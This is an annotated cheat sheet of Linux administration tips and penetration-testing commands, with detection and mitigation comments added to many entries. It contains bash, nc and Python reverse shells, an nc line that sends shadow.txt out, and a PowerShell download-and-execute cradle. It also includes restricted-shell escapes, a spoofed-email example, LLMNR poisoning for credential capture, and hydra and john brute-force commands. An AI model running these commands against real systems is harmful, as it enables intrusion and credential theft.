Tips & tricks of the more ultra rare, spicy, variety.
On opposite day are reverse shells, bind shells? 💙
# Only works with the bash shell: /dev/tcp/<host>/<port> is a redirection that
# bash itself turns into a TCP connection; no such file exists under /dev.
# Detection: the result is an interactive bash (-i) whose stdin, stdout and
# stderr are all the same outbound socket, which is visible in process/socket
# telemetry (a shell process owning an established TCP connection).
# Mitigation: default-deny egress filtering stops the outbound connection.
rhost="10.0.0.1"; rport="8080"; /bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1
# bash -s | option enables bash to read from 'stdin'
# Requires the nc binary
# The named pipe /tmp/f carries what nc receives into bash, and bash's
# stdout/stderr go back out through nc.
# Detection: mkfifo in a world-writable directory followed by nc making an
# outbound connection from the same session; the FIFO stays behind in /tmp.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
# Python2.7 command (-c) to connect to 10.0.0.1:8080 using the socket library
# The socket's file descriptor is duplicated onto fds 0, 1 and 2 before
# /bin/bash -i is started, so the shell's I/O is the TCP connection.
# Detection: process lineage python -> bash -i with a socket as stdio, and a
# long 'python -c' command line that imports socket, subprocess and os.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
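# --- Indexed arrays ---
# Declare an indexed array
declare -a my_array
my_array[0]='zero'
my_array[1]='one'
# OR
my_array=(zero one)
# Print each element in my_array
for i in "${my_array[@]}"; do echo "$i"; done
# Returns the size of the array
echo "${#my_array[@]}"
# Append to the array. The parentheses are required: a bare 'my_array+=three'
# concatenates the string onto element 0 instead of adding a new element.
my_array+=(three)
# Remove an index from the array. The subscript is quoted so the shell cannot
# glob-expand 'my_array[2]' against file names in the current directory.
unset 'my_array[2]'

# --- Associative arrays ---
# An existing indexed array cannot be converted with 'declare -A', so the
# name is released first.
unset my_array
# Declare an associative array (dictionary)
declare -A my_array
my_array=([z]=zero [o]=one)
# Print each key in my_array
for key in "${!my_array[@]}"; do echo "$key"; done
# Returns the number of key/value pairs
echo "${#my_array[@]}"
# Remove key/pair from assoc. array
unset 'my_array[o]'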
I/O OP | USAGE |
---|---|
1> results.txt | stdout writes to the file |
2> stderr.txt | stderr writes to the file |
&> out.txt | stdout & stderr write to the file |
nc 10.0.0.1 1337 < shadow.txt | Send file input to 10.0.0.1:1337 |
COMMAND | EXAMPLE | INFO |
---|---|---|
fmt | cat words.txt | fmt | Formats stdin into paragraphs. |
pr | cat words.txt | fmt | pr | Formats stdin into pages. |
lpr | cat words.txt | fmt | pr | lpr | Sends stdin to a printer. |
tr | cat /dev/urandom | tr -dc '[:alnum:]' | Output random password from /dev/urandom |
# Change Ubuntu 18.04 Network interfaces back to wlan/eth
sudo vim /etc/default/grub
# Edit the variable 'GRUB_CMDLINE_LINUX' to the following:
GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
# Write / Quit then run the following
sudo update-grub && sudo reboot
# Check
sudo ip a
# Download aircrack-ng linux driver
# -b v5.3.4 selects a branch or tag by name; a name can be moved upstream, so
# record the commit actually built (git rev-parse HEAD) if the build has to be
# reproducible or reviewed later.
git clone -b v5.3.4 https://github.com/aircrack-ng/rtl8812au.git
cd rtl*
# Both make steps run the repository's Makefile as root and the result is an
# out-of-tree kernel module, i.e. code that runs with kernel privileges.
sudo make -j4
sudo make install
# 'make' installs the '88XXau.ko' driver to '/lib/modules/5.0.0-25-generic/kernel/drivers/net/wireless/' on Ubuntu 18.04
# Now edit /etc/NetworkManager/NetworkManager.conf and add the following. Replace the mac with the mac of the card
[keyfile]
unmanaged-devices=mac:00:c0:ca:95:b8:58
# Write / Quit
sudo service NetworkManager restart
# Set interface down
sudo ip link set wlan1 down
# Set monitor mode
sudo iw dev wlan1 set type monitor
# Set interface up
sudo ip link set wlan1 up
# airodump-ng
sudo airodump-ng -w testdump --wps --beacon --band ag -M -U wlan1
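# Install for Ubuntu 18.04
# The repository signing key goes into its own keyring and the source entry is
# bound to it with signed-by. 'apt-key add' is deprecated and places the key in
# the global trust store, where it is accepted for every configured repository.
wget -O - https://www.kismetwireless.net/repos/kismet-release.gpg.key \
  | gpg --dearmor \
  | sudo tee /usr/share/keyrings/kismet-archive-keyring.gpg >/dev/null
echo 'deb [signed-by=/usr/share/keyrings/kismet-archive-keyring.gpg] https://www.kismetwireless.net/repos/apt/release/bionic bionic main' | sudo tee /etc/apt/sources.list.d/kismet.list
sudo apt update
sudo apt install -y kismet
kismet wlan1
# Then go to the web interface http://localhost:2501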
# Add the following to /etc/apt/preferences.d/preferences
Package: *
Pin: release o=Ubuntu
Pin-Priority: 1000
Package: *
Pin: release a=kali-rolling
Pin-Priority: 100
# Write / Quit
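# A '>' redirection is opened by the calling shell, so writing under /etc/apt
# fails for a non-root user; 'sudo tee' performs the write as root. Plain echo
# (no -n) keeps the trailing newline on the entry.
# The mirror is plain HTTP: package integrity then rests on APT verifying the
# signed Release file, so the archive key has to be installed for this source.
echo 'deb http://http.kali.org/kali kali-rolling main non-free contrib' | sudo tee /etc/apt/sources.list.d/kali.list >/dev/null
sudo apt update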
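# apt-key is deprecated (and was run here without root); the de-armored key is
# written to a keyring file as root instead.
# Keys under /etc/apt/trusted.gpg.d/ are trusted for every configured
# repository; a keyring referenced with [signed-by=...] in the source entry is
# the narrower option.
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/kali-archive-keyring.gpg >/dev/null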
# Spoof MAC Address
ifconfig eth0 hw ether 00:1c:bf:87:25:d5
# Change Default Gateway
route add default gw $IP_ADDRESS $INTERFACE_NAME
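# Symbolic link of /dev/null to new file of ${HOME}/nohup.out
# The path is quoted so a home directory containing spaces or glob characters
# is passed to ln as a single argument.
ln -s -- /dev/null "${HOME}/nohup.out"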
pv utility 🔨
# Display progress of file being read
pv -p -e '/usr/share/wordlists/WORDLISTS.tar.gz' | zgrep -ia 'myemail@gmail.com' | tee /tmp/results.lst
gzip -cd *.tar.gz | grep -aniTEf ~/data/emails.egrep > matches.txt
# gzip --stdout --decompress
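# EXPIRED KEY - APT UPDATE
# The signing key is fetched over HTTPS: over plain HTTP an on-path attacker
# can substitute a key of their own, and APT would then accept packages signed
# with it. apt-key is deprecated, so the key is written to a keyring file.
# Assumes the published key is ASCII-armored (hence --dearmor) - confirm.
wget -O - https://apt.metasploit.com/metasploit-framework.gpg.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/metasploit-framework.gpg >/dev/null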
ALIASES | INFO |
---|---|
alias ..='cd ..' | cd command shortcut |
alias ...='cd ../../../' | cd command shortcut |
alias ....='cd ../../../../' | cd command shortcut |
alias .2='cd ../../' | cd command shortcut |
alias .3='cd ../../../' | cd command shortcut |
alias .4='cd ../../../../' | cd command shortcut |
alias .5='cd ../../../../../' | cd command shortcut |
alias _='sudo' | sudo command shortcut |
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal | alert a notification popup |
alias bc='bc -l' | bc command fix |
alias c='clear' | clear command shortcut |
alias chgrp='sudo chgrp --preserve-root' | sudo command shortcut |
alias chmod='sudo chmod --preserve-root' | sudo command shortcut |
alias chown='sudo chown --preserve-root' | sudo command shortcut |
alias chownd='sudo chown -R --preserve-root $USER:$USER' | sudo command shortcut |
alias dd='dd status=progress' | Status is always progress |
alias dr='docker run -it' | Run container interactively |
alias drm='docker run -it --rm' | Run container then remove |
alias drme='docker run -it --rm -e HOME=$HOME -v $HOME:$HOME -w $PWD -u $(id -u):$(id -g)' | Run container with env variables |
alias egrep='egrep --color=auto' | *grep command shortcut |
alias exot='exit' | exit typo fix |
alias ff='sudo find . -type f -iname $1 2>/dev/null' | find a file from the current dir |
alias fgrep='fgrep --color=auto' | *grep command shortcut |
alias grep='grep --color=auto' | *grep command shortcut |
alias halt='sudo /sbin/halt' | sudo command shortcut |
alias ipt='sudo iptables' | iptables command shortcut |
alias iptlist='sudo /sbin/iptables -L -n -v --line-numbers' | iptables command shortcut |
alias iptlistfw='sudo /sbin/iptables -L FORWARD -n -v --line-numbers' | iptables command shortcut |
alias iptlistin='sudo /sbin/iptables -L INPUT -n -v --line-numbers' | iptables command shortcut |
alias iptlistout='sudo /sbin/iptables -L OUTPUT -n -v --line-numbers' | iptables command shortcut |
alias l='ls -CF' | ls command shortcut |
alias la='ls -AF --color=auto' | ls command shortcut |
alias lc='cat -n' | cat with line numbers |
alias less='less -S' | Do NOT wrap lines in less |
alias lh='ls --color=auto -lisAdhF .[^.]*' | ls command shortcut |
alias ll='ls -lhF --color=auto' | ls command shortcut |
alias lla='ls -lAhF --color=auto' | ls command shortcut |
alias ls='ls --color=auto' | ls command shortcut |
alias mkdir='mkdir -pv' | mkdir folders verbosely |
alias netstat='sudo netstat -plan' | netstat all listening ports |
alias path='echo -e ${PATH//:/\\n}' | echo current $PATH variable |
alias ping='ping -c 3' | Do NOT ping continuously |
alias poweroff='sudo /sbin/poweroff' | sudo command shortcut |
alias reboot='sudo /sbin/reboot' | sudo command shortcut |
alias reload='reset; . ~/.bashrc; . ~/.bash_aliases' | Reload bash with proper env |
alias rm='rm -I --preserve-root' | rm interactively |
alias rms='shred -uz' | rm securely |
alias shutdown='sudo /sbin/shutdown' | sudo command shortcut |
alias txz='tar --xz -xf' | Un-tar xz files |
alias tzx='tar -zxf' | Un-tar gzip files |
alias wget='wget -c' | Continue wget downloads |
# Record the session: -t writes timing data to stderr (redirected to
# timing.log) and -a appends the terminal output to output.session.
# The typescript holds everything shown on the terminal, including any
# credentials or tokens that were displayed, so restrict who can read it.
script -t 2> timing.log -a output.session
# Replay the recorded session using the timing data
scriptreplay timing.log output.session
# Bookmark directories using 'pushd'
pushd /var/www/html/
pushd /etc/apt/
pushd ~/Projects/airodump/aug/
# Then use 'popd' to pull from the stack!
popd
firefox --noremote --ProfileManager
##
General Debian/Ubuntu based distro copy-&-paste-able commands
objdump -f "$file" | grep '^architecture' | cut -d, -f1 | sed 's/architecture: //'
file mysterio.bin
# Target 1
/bin/bash -i &> /dev/tcp/${rhost}/${rport} 0>&1
# Reverse Shell
mknod backpipe p; nc ${rhost} ${rport} 0<backpipe | /bin/bash 1>backpipe
# One-shot Web Server
{ printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$(wc -c < some.file)"; cat some.file; } | nc -l ${lport}
# UDP Port scan
nc -vzu ${rhost} ${rports}
# Port scanning
nc -v -n -z -w 1 ${rhost} ${rports}
# NCat
# HTTPS GET Request
printf 'GET /rootme HTTP/1.1\r\nHost: rootme.com\r\n\r\n' | ncat --ssl rootme.com 443
# NCat SMTP Client
ncat -C mail.rootme.com 25
# HELO client.rootme.com
# MAIL FROM:attacker@rootme.com
# RCPT TO:victim@rootme.com
# DATA
# From: ceo@rootme.com
# To: victim@rootme.com
# Subject: You're fired.
#
# Sorry not sorry.
# .
# QUIT
# Netcat HTTP Request
nc 10.0.0.1 80
GET / HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0
Referrer: google.com
# <hit enter>
# Simple Web Server
# Linux
ncat -lk -p 8080 --sh-exec "echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html"
# or
ncat --lua-exec httpd.lua --listen 8080 --keep-open
# Windows
ncat -lk -p 8080 --sh-exec "echo HTTP/1.1 200 OK& echo(&type index.html"
# Port forward
ncat -l localhost 8080 --sh-exec "ncat example.org 80"
# SSH Tunnel NCat
ssh -o ProxyCommand="ssh -q ${gateway} ncat %h %p" ${rhost}
# Dynamic SSH Tunnel
ssh ${gateway} -D 8080
ncat --proxy localhost:8080 --proxy-type socks5 ${rhost}
# SSH Tunneled NCat file transfer
ssh -NfL 1337:localhost:7331
ncat -v -w 2 localhost 1337 < sent
ncat -lvnp 7331 localhost > received
# NCat honeyport
ncat -l --keep-open 1337 --hex-dump gotscanned.log > /dev/null
# NCat SSL Tunnel
openssl req -new -x509 -keyout test-key.pem -out test-cert.pem
ncat --listen --ssl --ssl-cert test-cert.pem --ssl-key test-key.pem
ncat --ssl-verify --ssl-trustfile test-cert.pem
# Write base64 data without newlines
base64 -w 0 foo.zip | base64 -d > foo2.zip
# base64: Removes any invalid input
cat file.b64 | base64 -di > binary
# NameServers Query for target.org
dig +short ns target.org
# A RECORD DNS Query
# Goal: Get the IP's associated to the toplevel domain.
dig a target.org @nameserver
# MX RECORD DNS Query
# Goal: Find mail servers to enumerate
dig mx target.org @nameserver
# DNS Zone Transfer Query
# Goal: Acquire all DNS entries for hosts within the 'target.org' zone
# NOTE(review): the DNS query type for a zone transfer is AXFR; 'afxr' below
# looks like a transposition - confirm.
# Defender view: an authoritative server should answer transfers only for its
# configured secondaries (address ACLs and/or TSIG) and log refused attempts.
dig afxr target.org @nameserver
# Bruteforce Subdomains
dnsrecon -d zonetransfer.me -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
wget --mirror -k ${depth} ${url}
# -OR- httrack
Workarounds for restricted shells.
# ez pz
cd "$(dirname ${path_to_bin}/rootme)"
# TTY Spawn
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
# Vi
vi
:!bash
# gcc compile
echo 'int main() { return chmod("/bin/chmod", 0755); }' | gcc -x c - && ./a.out
# x86 load file
/lib/i386-linux-gnu/ld-linux.so.2 ${path_to_bin}/rootme
# x64 load file
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ${path_to_bin}/rootme
install -m a+x /bin/chmod /tmp/chmod2
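# Prebuilt binary from a third-party repository, taken from a moving branch
# ('master'): its content can change between downloads, so verify it before use.
# -f makes curl fail on an HTTP error instead of saving the error page as the
# "binary", -S still reports the error under -s, and --create-dirs creates
# /tmp/socat when it is missing.
curl -fsS --create-dirs https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat -o /tmp/socat/socat
# Compare against a digest obtained from a source you trust (placeholder value)
echo '<EXPECTED_SHA256>  /tmp/socat/socat' | sha256sum -c -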
# browser => developer tools => network => copy & paste response to file
cat file.b64 | base64 -di > binary
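# Overwrite a whole block device with an AES-256-CTR keystream, which is a fast
# source of pseudo-random data.
# Caveat: on SSDs and other flash media, wear levelling and spare blocks mean
# an overwrite does not reach every physical cell; for those, the drive's own
# sanitize / secure-erase command or destroying the key of an encrypted volume
# is the dependable method.
_DEVICE="/dev/sdc"
if [[ ! -b "${_DEVICE}" ]]; then
  # Guard against a typo or a path that is a regular file
  printf 'not a block device: %s\n' "${_DEVICE}" >&2
else
  # The write below is irreversible, so the operator confirms the target
  read -r -p "Overwrite ALL data on ${_DEVICE}? Type YES to continue: " _CONFIRM
  if [[ "${_CONFIRM}" == "YES" ]]; then
    # Throw-away key material; it never has to be recovered
    _PASS=$(tr -cd '[:alnum:]' < /dev/urandom | head -c 128)
    # The passphrase is handed over on fd 3 instead of 'pass:...' on the
    # command line, where it would be visible in the process list.
    # iflag=fullblock makes dd assemble full 64K blocks from the pipe.
    # dd ends with "No space left on device" once the device is full; that is
    # the expected way for this pipeline to finish.
    openssl enc -aes-256-ctr -pass fd:3 -nosalt </dev/zero 3<<<"${_PASS}" \
      | dd bs=64K of="${_DEVICE}" iflag=fullblock status=progress conv=notrunc
  else
    printf 'aborted\n' >&2
  fi
fi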
type C:\Users\Administrator\Desktop\flag.txt
# Mount SMB Share
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no
# Download-and-execute: the script body is fetched as a string and handed to
# Invoke-Expression (iex), so no script file is written to disk.
# Detection: PowerShell Script Block Logging (event ID 4104) records the script
# text that is evaluated, and AMSI exposes it to the installed anti-malware
# engine; the outbound request itself appears in proxy / DNS logs.
iex ((New-Object Net.WebClient).DownloadString("https://abc.ru/mal.ps1"))
# Intended to pipe the content of a local script file to iex
&"{Get-Content .\mal.ps1 | iex}"
# SHA-512 digest of a file
Get-FileHash -Algorithm SHA512 .\test.txt
# gci = Get-ChildItem; '%' is an alias for ForEach-Object
gci | foreach-object { write-output "Object: $_" }
gci | % { write-output "Object: $_" }
# '?' is an alias for Where-Object
get-process | where-object { $_.name -eq "notepad" }
get-process | ? { $_.name -eq "notepad"}
# Test-Connection against 192.168.0.1 through 192.168.0.254
1..254 | % { test-connection 192.168.0.$_ }
// WUTitDO: Download a binary from Github
var github_user = "andrew-d";
var git_branch = "master";
// Raw base64 encoded byte stream
var b64raw = "https://raw.githubusercontent.com/"+ github_user +"/static-binaries/"+ git_branch +"/binaries/linux/x86_64/socat";
var xreq = new XMLHttpRequest();
xreq.open('GET', b64raw, true);
xreq.send();
document.write(xreq.responseText)
// Your webpage should now be base64 text to save
// If method 1 doesn't work try this!
var apijson = "https://api.github.com/repos/"+ github_user +"/static-binaries/contents/binaries/linux/x86_64/socat?ref=master";
var xreq = new XMLHttpRequest();
xreq.open('GET', apijson, true);
xreq.send();
document.write(JSON.parse(xreq.responseText).content)
// Your webpage should now be base64 text to save
OPERATING SYSTEM | TTL SIZE |
---|---|
Windows | 128 |
Linux | 64 |
Solaris | 255 |
Cisco / Network | 255 |
CLASS | IP ADDRESS RANGE |
---|---|
A | 0.0.0.0 - 127.255.255.255 |
B | 128.0.0.0 - 191.255.255.255 |
C | 192.0.0.0 - 223.255.255.255 |
D | 224.0.0.0 - 239.255.255.255 |
E | 240.0.0.0 - 255.255.255.255 |
CLASS | RANGE |
---|---|
A | 10.0.0.0 - 10.255.255.255 |
B | 172.16.0.0 - 172.31.255.255 |
C | 192.168.0.0 - 192.168.255.255 |
D | 127.0.0.0 - 127.255.255.255 |
CIDR | DECIMAL MASK | NUMBER OF HOSTS |
---|---|---|
/31 | 255.255.255.254 | 1 Host |
/30 | 255.255.255.252 | 2 Hosts |
/29 | 255.255.255.248 | 6 Hosts |
/28 | 255.255.255.240 | 14 Hosts |
/27 | 255.255.255.224 | 30 Hosts |
/26 | 255.255.255.192 | 62 Hosts |
/25 | 255.255.255.128 | 126 Hosts |
/24 | 255.255.255.0 | 254 Hosts |
/23 | 255.255.254.0 | 510 Hosts |
/22 | 255.255.252.0 | 1022 Hosts |
/21 | 255.255.248.0 | 2046 Hosts |
/20 | 255.255.240.0 | 4094 Hosts |
/19 | 255.255.224.0 | 8190 Hosts |
/18 | 255.255.192.0 | 16382 Hosts |
/17 | 255.255.128.0 | 32766 Hosts |
/16 | 255.255.0.0 | 65534 Hosts |
/15 | 255.254.0.0 | 131070 Hosts |
/14 | 255.252.0.0 | 262142 Hosts |
/13 | 255.248.0.0 | 524286 Hosts |
/12 | 255.240.0.0 | 1048574 Hosts |
/11 | 255.224.0.0 | 2097150 Hosts |
/10 | 255.192.0.0 | 4194302 Hosts |
/9 | 255.128.0.0 | 8388606 Hosts |
/8 | 255.0.0.0 | 16777214 Hosts |
# Each of these serves the current working directory over unauthenticated,
# unencrypted HTTP on port 8080, so start them from a directory that holds
# only the files meant to be shared.
# Python 2
python -m SimpleHTTPServer 8080
# Python 3; listens on all interfaces unless --bind <address> is given
python3 -m http.server 8080
# PHP built-in server, explicitly bound to all interfaces (0.0.0.0)
php -S 0.0.0.0:8080
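# NFS Shares are linux predominant
mount 10.0.0.1:/vol/share /mnt/nfs
# CIFS is a dialect of SMB and are windows predominant
# The credentials come from a root-only file (chmod 600) instead of
# '-o password=...', which exposes the password in the process list and in
# shell history. /root/.smbcredentials is an example path; the file holds one
# setting per line:
#   username=user
#   password=pass
#   domain=blah
mount -t cifs -o credentials=/root/.smbcredentials //192.168.1.X/share-name /mnt/cifs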
# Enumerate users
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 10.0.0.1
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 10.0.0.0/24
# Default linux utilities
nmblookup -A 10.0.0.1
smbclient //MOUNT/share -I 10.0.0.1 -N
rpcclient -U "" 10.0.0.1
# SMB Version
smbclient -L //10.0.0.1
# Open SMB Shares on a subnet
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=${username},smbpass=${password} -p445 10.0.0.0/24
# See links for download
enum4linux 10.0.0.1
# These modules answer LLMNR / NetBIOS name queries that hosts broadcast when
# DNS has no answer, then collect the authentication attempt that follows.
# Mitigation: disable LLMNR (Group Policy "Turn off multicast name resolution")
# and NetBIOS over TCP/IP on clients, and require SMB signing.
# Detection: LLMNR (UDP 5355) or NBT-NS (UDP 137) responses coming from a host
# that is not expected to answer name queries.
msfconsole
# Spoof/Poison
use auxiliary/spoof/llmnr/llmnr_response
use auxiliary/spoof/nbns/nbns_response
# Capture Credentials
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
# -OR- See links to download
python Responder.py -i ${localhost-ip} -I eth0
# Produces NTLMv2 Hash to crack
# See appendix for plink download link
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
-A  Allows Agent Forwarding
-N  Do NOT execute a command
-f  Background the process
# Local Port Forward
# -A also forwards the local ssh-agent to the gateway host. A port forward
# works without it, and while the session is open anyone with root on that
# host can use the forwarded agent to authenticate as you.
ssh -NAfL ${lport}:${final-host}:${rport} ${user}@${gateway-host}
# Example
ssh -NAfL 8080:192.168.0.3:80 root@192.168.0.2
# Remote Port Forward
ssh -NAfR ${rport}:localhost:${port-to-publicize} user@${proxy-host}
ssh -NAfR 2222:localhost:22 user@192.168.0.2
# Dynamic SOCKS Proxy
ssh -NAfD ${remote-proxy-port} ${remote-proxy-host}
# Example
ssh -NAfD 8080 root@10.0.0.80
Link | Usage |
---|---|
SimplyEmail | Email enumeration tool hosted on Github. |
udp-proto-scanner | UDP protocols scanner hosted on Github. |
Responder.py | NetBIOS/LLMNR Poisoning and Spoofing tool to capture NTLMv2 Hashes, hosted on Github. |
plink.exe | Link to download the x64 plink binary from the PuTTY project, for Remote Port Forwarding. |
HASH | SIZE |
---|---|
MD5 Hash Length | 16 Bytes |
SHA-1 | 20 Bytes |
SHA-256 | 32 Bytes |
SHA-512 | 64 Bytes |
HASH | EXAMPLE |
---|---|
MD5 Hash | 8743b52063cd84097a65d1633f5c74f5 |
MD5 $PASS:$SALT | 01dfae6e5d4d90d9892622325959afbe:7050461 |
MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
SHA1 Hash | b89eaac7e61417341b710b727768294d0e6a277b |
SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 |
SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 |
SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 |
SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f |
SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd |
SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a |
NTLM Hash | b4b9b02e6f09a9bd760f388b67351e2b |
# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes
# Formatted Hash with Wordlist Attack
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt
# Formatted Hash with Bruteforce Attack
# NOTE(review): --show prints the passwords already cracked for this hash
# file; it does not start a new run, so the heading above does not match.
john --format=descrypt hash --show
# FTP
hydra -l ${USERNAME} -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 ftp -V
# POP3
hydra -l ${USERNAME} -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 pop3 -V
# SMTP
hydra -P /usr/share/wordlistsnmap.lst -f 10.0.0.1 smtp -V
# Use (-t) to limit concurrent connections - ex: hydra -t 15